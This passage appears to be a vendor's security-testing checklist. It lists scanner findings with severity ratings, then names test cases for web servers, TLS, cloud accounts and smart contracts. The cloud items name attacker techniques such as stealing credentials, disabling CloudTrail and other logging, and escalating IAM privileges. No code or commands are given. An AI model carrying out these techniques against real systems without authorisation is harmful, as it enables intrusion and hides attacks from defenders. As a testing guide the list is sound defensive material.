130. Cookie manipulation (reflected DOM-based) (Low)
131. Cookie manipulation (stored DOM-based) (Low)
132. Ajax request header manipulation (DOM-based) (Low)
133. Ajax request header manipulation (reflected DOM-based) (Low)
134. Ajax request header manipulation (stored DOM-based) (Low)
135. Denial of service (DOM-based) (Information)
136. Denial of service (reflected DOM-based) (Information)
137. Denial of service (stored DOM-based) (Low)
138. HTML5 web message manipulation (DOM-based) (Information)
139. HTML5 web message manipulation (reflected DOM-based) (Information)
140. HTML5 web message manipulation (stored DOM-based) (Information)
141. HTML5 storage manipulation (DOM-based) (Information)
142. HTML5 storage manipulation (reflected DOM-based) (Information)
143. HTML5 storage manipulation (stored DOM-based) (Information)
144. Mixed content (Information)
145. Link manipulation (reflected DOM-based) (Low)
146. Link manipulation (stored DOM-based) (Low)
147. Link manipulation (reflected and stored) (Information)
148. Document domain manipulation (DOM-based) (Medium)
149. Document domain manipulation (reflected DOM-based) (Medium)
150. Document domain manipulation (stored DOM-based) (Medium)
151. DOM data manipulation (DOM-based) (Information)
152. CSS injection (reflected and stored) (Medium)
153. Client-side HTTP parameter pollution (reflected) (Low)
154. Client-side HTTP parameter pollution (stored) (Low)
155. Form action hijacking (reflected) (Medium)
156. Form action hijacking (stored) (Medium)
157. Database connection string disclosed (Medium)
158. Source code disclosure (Low)
159. Directory listing (Information)
160. Email addresses disclosed (Information)
161. Private IP addresses disclosed (Information)
162. Social security numbers disclosed (Information)
163. Credit card numbers disclosed (Information)
164. Private key disclosed (Information)
165. Cacheable HTTPS response (Information)
166. Base64-encoded data in parameter (Information)
167. Multiple content types specified (Information)
168. HTML does not specify charset (Information)
169. HTML uses unrecognized charset (Information)
170. Content type incorrectly stated (Low)
171. Content type is not specified (Information)
172. SSL certificate (Medium)
173. Unencrypted communications (Low)
174. Strict transport security not enforced (Low)
3.4 Server-Level Test Cases

Information Gathering
1. Test RIA cross-domain policy
2. Fingerprint web server
3. Test network/infrastructure configuration
4. Test HTTP methods
5. Test HTTP Strict Transport Security (HSTS)
6. Testing for cookie attributes

SSL/TLS Testing
7. Insufficient public key length
8. Heartbleed
9. POODLE SSL vulnerability
10. ChangeCipherSpec injection
11. BREACH
12. BEAST
13. Forward secrecy support
14. RC4 support
15. CRIME and TIME vulnerabilities
16. Lucky13
17. HSTS: check for header
18. HSTS: reasonable duration of max-age
19. HSTS: check for includeSubDomains support
20. Certificate expiration
21. Host name mismatch
22. Weak/insecure hashing algorithm in the certificate signature
23. SSLv2 support
24. Weak ciphers check (Low, Anon, Null, Export)
25. Null prefix in the certificate
26. HTTPS stripping
27. SurfJacking
28. Non-SSL elements/content embedded in SSL page
29. Cache control

Configuration and Deployment Management Testing
30. Test RIA cross-domain policy
31. Test network/infrastructure configuration
32. Test HTTP methods
33. Test HTTP Strict Transport Security
34. Testing for cookie attributes

Cryptography
35. Test HTTP Strict Transport Security
36. Testing for weak SSL/TLS ciphers and insufficient transport layer protection
37. Test HTTP methods
3.5 Test Cases for Windows
3.6 Test Cases for Android and iOS
3.7 Test Cases for Cloud (AWS, Azure, GCP, and Other)

Test Cases for Cloud Services
1. Test for credential-stealing attack on operations of a cloud key management service
2. Test for unauthenticated database access
3. Test for improper permissions on databases
4. Test for compromising access keys
5. Test for extracting keys from a VM/instance
6. Test for exploits due to improper configurations
7. Test for public exploits in VMs/instances
8. Test for internal exploitation of backdoors
9. Test for subdomain takeover
10. Test for access management privilege escalation
11. Test for remote code execution (RCE)
12. Test for role enumeration
13. Test for VM service privilege escalation
14. Test for IAM enumeration
15. Test for Bitbucket Server data exposing credentials
16. Test for cloud compromise by DNS rebinding
17. Test for tampering with local Windows/Linux logs
18. Test for loopholes that add root certificates and SSH private keys to VMs and users
19. Test for loopholes that assign a secondary private IP address to an instance/VM at launch
20. Test for unauthenticated retrieval of VM images from storage accounts, and analysis of them for passwords, keys and certificates that give access to live resources
21. Test for obtaining OS-level access to instances/VMs via a workload
22. Test for management service privileges
23. Test for running or deploying a workload with an assigned service or role and exporting the instance credentials for those privileges
24. Test for server and application version and framework fingerprinting, and for sensitive PII exposed in server/application logs
25. Test for CSV injection
26. Test for MITM attack on an Elastic Load Balancer (ELB) for session hijacking
27. Test for credential-stealing attack on stored credentials
28. Test for credential-stealing attack on a cloud workload
29. Test for altering data in a datastore for fraudulent transactions or static-website compromise
30. Test for altering a serverless function, logic app or other business-logic implementation for action on objective or escalation
31. Test for altering a DNS record set in a trusted zone and/or certificates for the resource record set, to divert traffic, create phishing sites and abuse the brand (AWS ACM, AWS Route 53, Azure DNS Service)
32. Test for altering data in local SQL or MySQL databases
33. Test for operating in regions where logging is not enabled, or disabling global logging (such as CloudTrail)
34. Test for altering log files in a non-validated log store, or disabling validation (such as CloudTrail log file validation)
35. Test for disabling network traffic analysis/logging (VPC Flow Logs)
36. Test for disabling cloud alerting to prevent detection and response
37. Test for disabling data store access logging to prevent detection and response (CloudTrail data events, S3 access logging, etc.)
38. Test for altering log retention or damaging the integrity of logs (S3 lifecycle rules, KMS decryption, CMK key deletion, role privilege lockout)
39. Test for process hooking, process injection, Windows access token manipulation, and leveraging misconfigured sudo capabilities
40. Test for creating or resetting a login, access key or temporary credential belonging to a high-privilege user (such as IAM CreateAccessKey, STS, or IAM UpdateLoginProfile)
41. Test for changing the default policy version for a user or for new users to include additional privileges (such as SetDefaultPolicyVersion)
42. Test for leveraging data or code pipelines to execute operations on behalf of their assumed roles (AWS Data Pipeline ShellCommandActivity, injecting Python code into a pickled Celery task on an SQS queue)
3.8 Test Cases for Blockchain

Test Cases for Smart Contracts
1. Test for function default visibility
2. Test for unencrypted private data on-chain
3. Test for code with no effects
4. Test for message call with hardcoded gas amount
5. Test for unexpected Ether balance
6. Test for hash collisions with multiple variable-length arguments
7. Test for presence of unused variables
8. Test for right-to-left-override control character (U+202E)
9. Test for typographical error
10. Test for DoS with block gas limit
11. Test for arbitrary jump with function type variable
12. Test for insufficient gas griefing
13. Test for incorrect inheritance order
14. Test for write to arbitrary storage location
15. Test for requirement violation
16. Test for lack of proper signature verification
17. Test for missing protection against signature replay attacks
18. Test for weak sources of randomness from chain attributes
19. Test for shadowing state variables
20. Test for incorrect constructor name
21. Test for signature malleability
22. Test for block values as a proxy for time
23. Test for authorization through tx.origin
24. Test for transaction order dependence
25. Test for DoS with failed call
26. Test for delegatecall to untrusted callee
27. Test for use of deprecated Solidity functions
28. Test for assert violation
29. Test for uninitialized storage pointer
30. Test for state variable default visibility
31. Test for reentrancy
32. Test for unprotected SELFDESTRUCT instruction
33. Test for unprotected Ether withdrawal
34. Test for unchecked call return value
35. Test for floating pragma
36. Test for outdated compiler version
37. Test for integer overflow and underflow
Your plug & play cyber security suite. Questions? Contact us at hello@getastra.com